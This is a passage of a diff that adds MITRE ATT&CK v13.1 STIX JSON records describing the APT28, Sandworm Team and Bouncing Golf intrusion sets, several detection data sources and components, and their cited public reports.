"description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "IRON TWILIGHT", + "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) " + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. 
Retrieved April 15, 2019.", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "ESET Zebrocy May 2019", + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. 
Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "Ars Technica GRU indictment Jul 2018", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + }, + { + "source_name": "TrendMicro Pawn Storm Dec 2020", + "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. 
Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Talos Seduploader Oct 2017", + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" + }, + { + "source_name": "Microsoft STRONTIUM Aug 2019", + "description": "MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021", + "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. 
Retrieved July 26, 2021.", + "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + }, + { + "source_name": "SecureWorks TG-4127", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" + }, + { + "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017", + "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures" + }, + { + "source_name": "Secureworks IRON TWILIGHT Profile", + "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. 
Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The 
execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Bouncing Golf" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "type": "intrusion-set", + "created": "2020-01-27T16:55:39.688Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0097", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0097" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:58:44.722Z", + "name": "Bouncing Golf", + "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:00:38.029Z", + "name": "Protected Configuration", + "description": "Device configuration options that are not typically utilized by benign applications", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2", + "created": "2023-03-13T20:00:38.029Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence 
Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + 
"source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. 
Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). 
The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T19:30:41.131Z", + "name": "Application Vetting", + "description": "Application vetting report generated by an external cloud service.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Report" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "created": "2023-03-13T19:30:41.131Z", + "revoked": false, + "external_references": [ + { + 
"source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0041", + "external_id": "DS0041" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T19:36:25.108Z", + "name": "User Interface", + "description": "Visual activity on the device that could alert the user to potentially malicious behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Device" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "created": "2023-03-13T19:36:25.108Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0042", + "external_id": "DS0042" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. 
Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:40.409Z", + "name": "Sensor Health", + "description": "Information from host telemetry providing insights about system status, errors, or other notable functional activity", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0013", + "external_id": "DS0013" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + 
"x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). 
How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + }, + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ], + "spec_version": "2.0" +} diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0008005f-ca51-47c3-8369-55ee5de1c65a.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0008005f-ca51-47c3-8369-55ee5de1c65a.json new file mode 100644 index 0000000000000000000000000000000000000000..102b9e7e2241459441a3ddd36b0f4d191ce685e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0008005f-ca51-47c3-8369-55ee5de1c65a.json 
